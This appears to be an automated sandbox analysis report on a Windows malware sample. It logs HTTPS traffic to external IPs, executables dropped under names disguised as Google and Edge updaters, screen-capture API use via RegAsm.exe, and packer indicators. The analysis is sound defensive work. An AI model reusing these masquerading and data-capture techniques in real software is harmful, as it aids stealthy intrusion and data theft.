                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58693
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58690
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58717 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58547 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58564 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58709 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58619
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58629 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58616
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58615
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58618
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58617
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58612
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58578 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58611
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58555 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58614
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58532 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58621
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58620
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58741
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58693 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58676 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58521 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58601 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58627
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58748
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58538 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58629
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58647 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58628
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58623
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58744
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58622
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58573 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58625
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58746
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58624
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58745
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58632
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58631
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58612 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58732 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58549 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58566 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58520 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58543 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58623 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58755 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58638
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58537 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58639
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58755
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58633
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58754
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58636
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58514
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58591 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58635
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58520
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58762
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58640
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58522
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58579 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58521
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58642
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58636 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58760
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58617 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58628 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58653 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58527
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58648
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58611 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58529
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58524
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58645
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58766
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58523
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58554 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58644
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58526
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58647
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58525
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58646
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58531
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58652
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58772 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58530
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58533
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58775
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58532
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58653
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58744 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58650
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58642 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58526 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58600 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58560 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58585 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58545 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58631 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58522 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58551 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58648 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58539 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58660 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58766 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58622 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58754 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58731 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58714 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58760 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58594 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58708 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58708
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58605 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58709
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58703
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58577 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58702
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58701
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58556 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58616 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58562 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58671 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58583 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58627 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58604 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58714
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58717
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58610 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58595 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58703 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58713
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58712
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58720
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58666 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58527 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58672 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58567 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58699 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58544 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58609
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58632 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58605
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58604
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58607
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58728
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58601
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58600
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58720 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58724
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58602
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58723
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58688 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58610
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58533 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58776 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58748 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58621 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58589 -> 443
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:49709 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.6:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49716 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.26.3.46:443 -> 192.168.2.6:58514 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58520 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:58521 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:58524 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58522 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.6:58526 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.6:58530 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58531 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:58533 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.6:58536 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:58538 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58541 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:58543 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:58573 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:58575 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.6:58576 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.6:58577 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:58579 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.6:58582 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:58583 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58585 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58586 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58587 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:58595 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:58599 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.6:58600 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.6:58601 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:58605 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.6:58607 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:58611 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58615 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:58617 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58618 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58619 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58620 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58621 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58650 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58657 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58669 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58674 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58693 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58695 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58697 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58728 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58760 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58766 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58770 version: TLS 1.2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,19_2_00419010

                            System Summary

                            barindex
                            .NET source code contains very large array initializations
                            Source: 66fbfcc301a31_swws[1].exe.6.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 314368
                            Source: ZNiWLZA4sT3dAjz_lF65fVs6.exe.6.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 314368
                            Source: 66fbfccd837ac_vadggdsa[1].exe.6.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe.6.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                            PE file contains section with special chars
                            Source: file.exeStatic PE information: section name: Z Hi?
                            Source: LKMService.exe.0.drStatic PE information: section name: Z Hi?
                            Source: GoogleUpdater.exe.2.drStatic PE information: section name: Z Hi?
                            PE file has nameless sections
                            Source: file.exeStatic PE information: section name:
                            Source: LKMService.exe.0.drStatic PE information: section name:
                            Source: GoogleUpdater.exe.2.drStatic PE information: section name:
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0042BF20 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv,6_2_0042BF20
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E342E00_2_04E342E0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E322400_2_04E32240
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E32C880_2_04E32C88
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E328980_2_04E32898
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E32C780_2_04E32C78
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E324480_2_04E32448
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E322320_2_04E32232
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E324380_2_04E32438
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E321FB0_2_04E321FB
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E335600_2_04E33560
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E335700_2_04E33570
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017FD1702_2_017FD170
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F1C282_2_017F1C28
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F6CE02_2_017F6CE0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F20C92_2_017F20C9
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F80B42_2_017F80B4
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F87382_2_017F8738
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F853D2_2_017F853D
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017FA5382_2_017FA538
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F3D102_2_017F3D10
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F810A2_2_017F810A
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F3D012_2_017F3D01
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F81E82_2_017F81E8
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F85D62_2_017F85D6
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F81A02_2_017F81A0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F159A2_2_017F159A
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F85972_2_017F8597
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F80602_2_017F8060
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F802A2_2_017F802A
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F48082_2_017F4808
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F84E22_2_017F84E2
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017FB0A02_2_017FB0A0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F832D2_2_017F832D
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F73282_2_017F7328
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F83C22_2_017F83C2
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F838B2_2_017F838B
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F826A2_2_017F826A
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017FEE602_2_017FEE60
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F86492_2_017F8649
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F82332_2_017F8233
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F86192_2_017F8619
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F82F42_2_017F82F4
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F82BE2_2_017F82BE
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B65F02_2_058B65F0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B7D382_2_058B7D38
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B84152_2_058B8415
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B8F3A2_2_058B8F3A
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058BC1992_2_058BC199
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B89D02_2_058B89D0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B42E02_2_058B42E0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B22402_2_058B2240
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B7D272_2_058B7D27
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B9D382_2_058B9D38
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B9D482_2_058B9D48
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B35602_2_058B3560
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B35702_2_058B3570
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B2C882_2_058B2C88
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B24482_2_058B2448
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B69602_2_058B6960
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B28982_2_058B2898
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B28942_2_058B2894
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058BC3342_2_058BC334
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058BC36B2_2_058BC36B
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058B22302_2_058B2230
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00ECD1703_2_00ECD170
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00EC33E03_2_00EC33E0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00EC9B883_2_00EC9B88
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00EC6CC03_2_00EC6CC0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00EC1C283_2_00EC1C28
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00EC85983_2_00EC8598
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00ECB0A03_2_00ECB0A0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00ECB0903_2_00ECB090
